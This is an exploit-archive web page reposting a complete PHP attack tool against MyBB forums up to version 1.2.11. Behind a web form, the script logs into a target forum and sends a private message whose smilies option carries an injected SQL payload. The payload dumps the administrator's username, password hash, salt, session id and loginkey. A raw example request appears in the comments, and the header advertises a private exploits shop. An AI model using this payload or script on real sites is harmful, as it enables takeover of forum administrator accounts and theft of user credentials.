首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (2)
来源:www.vfcocus.net 作者:c411k 发布时间:2008-08-27  
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with+<3+from+ru_antichat',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=4),(select+password+from+mybb_users+where+uid=4),(select+salt+from+mybb_users+where+uid=4),admin_sid',(select+sid+from+mybb_adminsessions+where+uid=4),'admin_loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru  :)  b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08

error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);

header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");

?>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>mybb 1.2.11 xek</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
{
margin="5";
FONT-WEIGHT: normal;
COLOR: #B9B9BD;
BACKGROUND: #44474F;
FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif;
}

-->
</style>
</head>
<body>

<?php

function myflush($timee)
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
}

if (!$_GET)
{
echo
'<form action="'.$_SERVER['PHP_SELF'].'?fuck_mybb" method="post">
<input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value="&#8194;get admin passwd...&#8194;"><br><br>
<input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">
<font color="#B9B9BD">&#8194;&#172; for expamle "expdb.cc"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="patch" value="patch">
<font color="#B9B9BD">&#8194;&#172; patch 2 mybb forum, for expamle "community/mybb"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="username" value="username">
<font color="#B9B9BD">&#8194;&#172; you username on this forum, for expamle "c411k"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="pwd" value="password">
<font color="#B9B9BD">&#8194;&#172; you password, for expamle "h1world"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="uid_needed" value="1">
<font color="#B9B9BD">&#8194;&#172; admin id, default 1<br>
</form>';
}


if (isset($_GET['fuck_mybb']))
{
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http%3A%2F%2Flocalhost%2Fmybb_1210%2Findex.php';

function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
{
global $send_http;
$s = array();
$url = fsockopen($host, 80);
$send_http  = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
$send_http .= "Host: $host\r\n";
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
$send_http .= "Cookie: $cook1e\r\n";
$send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
$send_http .= "Connection: Close\r\n\r\n";
if ($method === 'POST')
{
$send_http .= $data_gp;
}
//print_r($send_http);
fputs($url, $send_http);
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
return $s;
}

echo '<pre>- start....';
myflush(50000);

$get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'fuckkk');
echo '<pre>- login '.$username.' with passwd = '.$pwd.' done';
myflush(50000);

foreach ($get_cookie as $value)
{
if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
{
$value = explode(";", $value);
$cookie = strstr($value[0], 'mybbuser');
break;
}
}
echo '<pre>- cookie: '.$cookie;
myflush(50000);

preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '<pre>- user id: '.$get_uid;
myflush(50000);

$data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=$uid_needed),(select+password+from+mybb_users+where+uid=$uid_needed),(select+salt+from+mybb_users+where+uid=$uid_needed),' admin sid',(select+sid+from+mybb_adminsessions+where+uid=$uid_needed),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
echo '<pre>- send exploit:
-------------------
'.$send_http.'
-------------------
look you private messages 4 admin passwd hash <a href=http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.' target=_blank>http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'</a>';
}


?>

</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Simple PHP Blog (SPHPBlog) <=
·Microsoft Visual Studio (Msmas
·GeekLog <= 1.5.0 Remote Arbitr
·Belkin wireless G router + ADS
·Dana IRC 1.4a Remote Buffer Ov
·Ultra Office ActiveX Control R
·Ultra Office ActiveX Control R
·NoName Script <= 1.1 Multiple
·webEdition CMS (we_objectID) B
·Acoustica Mixcraft <= 4.2 Buil
·Pars4U Videosharing V1 XSS / R
·Friendly Technologies (fwRemot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved